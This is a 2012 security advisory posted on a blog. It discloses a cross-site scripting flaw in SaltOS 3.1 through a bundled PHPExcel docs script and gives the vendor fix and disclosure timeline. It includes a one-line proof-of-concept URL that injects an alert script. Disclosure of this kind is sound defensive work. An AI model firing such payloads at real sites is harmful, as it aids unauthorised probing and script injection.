Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

SSCHADV2012-018 - SaltOS 3.1 Cross-Site Scripting vulnerability

Advisory:
SaltOS 3.1 Cross-Site Scripting vulnerability
Advisory ID:
SSCHADV2012-018
Author:
Stefan Schurtz
Affected Software:
Successfully tested on SaltOS 3.1 r4908
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
SaltOS 3.1 is prone to a Cross-Site Scripting vulnerability, because of using PHPExcel 1.7.7 (latest version)
 
==============
PoC-Exploit
==============
 
http://[target]/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ ‘><script>alert(‘xss’)</script>
 
=====
Solution
=====
 

Unused directories (docs, examples and tests directories from the PHPExcel/Shared/JAMA directory) are removed.

 
Update to the latest version (Fixed in the nightly build r5696 from 2012-08-14).
 
================
Disclosure Timeline
================
 
13-Aug-2012 – developer informed
13-Aug-2012 – feedback from developer
14-Aug-2012 – fixed by developer
 
====
Credits
====
 
Vulnerability found and advisory written by Stefan Schurtz.
 
=======
References
=======
 

Trackbacks

www.websecuritywatch.com on : PingBack

Unfortunately, the contents of this trackback can not be displayed.

Comments

Display comments as Linear | Threaded

No comments

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options
Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170